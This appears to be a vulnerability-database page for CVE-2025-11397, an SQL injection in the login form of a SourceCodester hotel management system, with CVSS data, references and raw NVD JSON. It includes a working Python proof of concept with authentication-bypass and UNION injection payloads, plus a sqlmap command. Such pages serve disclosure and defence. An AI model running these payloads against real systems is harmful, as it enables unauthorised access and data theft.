CVE-2025-11397

Description

A security flaw has been discovered in SourceCodester Hotel and Lodge Management System 1.0. The affected element is an unknown function of the file /login.php. Performing manipulation of the argument email results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Hotel and Lodge Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11397 - SourceCodester Hotel and Lodge Management System SQL Injection PoC # Vulnerability Location: /login.php # Vulnerable Parameter: email import requests # Target configuration TARGET_URL = "http://target.com/login.php" # SQL Injection Payload - Authentication Bypass payload_email = "' OR '1'='1' -- " payload_password = "anything" # Data extraction payload using UNION-based injection union_payload = "' UNION SELECT 1,2,3,4,5,6 -- " def exploit_auth_bypass(target_url, email, password): """ Attempt authentication bypass via SQL injection in email parameter """ data = { "email": email, "password": password } try: response = requests.post(target_url, data=data, timeout=10) if "dashboard" in response.text.lower() or "admin" in response.text.lower(): print(f"[+] Authentication bypassed successfully!") print(f"[+] Response length: {len(response.text)}") return True else: print(f"[-] Authentication bypass failed.") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False def exploit_data_extraction(target_url, payload): """ Extract database information via UNION-based SQL injection """ data = { "email": payload, "password": "test" } try: response = requests.post(target_url, data=data, timeout=10) print(f"[+] Response: {response.text[:500]}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None # Using sqlmap command line for automated exploitation: # sqlmap -u "http://target.com/login.php" --data="[email protected]&password=test" -p email --dbs if __name__ == "__main__": print("[*] CVE-2025-11397 PoC - SQL Injection in Hotel and Lodge Management System") print(f"[*] Target: {TARGET_URL}") # Attempt authentication bypass exploit_auth_bypass(TARGET_URL, payload_email, payload_password) # Attempt data extraction exploit_data_extraction(TARGET_URL, union_payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11397
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11397
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11397/
[4] VulDB https://vuldb.com/cve/CVE-2025-11397
[5] https://github.com/TThuyyy/cve1/issues/5
[6] https://vuldb.com/?ctiid.327334
[7] https://vuldb.com/?id.327334
[8] https://vuldb.com/?submit.665024
[9] https://www.sourcecodester.com/
[10] https://github.com/TThuyyy/cve1/issues/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11397", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:36.140", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Hotel and Lodge Management System 1.0. The affected element is an unknown function of the file /login.php. Performing manipulation of the argument email results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "01868A61-18A4-4C5D-B260-54D49603028E"}]}]}], "references": [{"url": "https://github.com/TThuyyy/cve1/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327334", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327334", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665024", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/TThuyyy/cve1/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}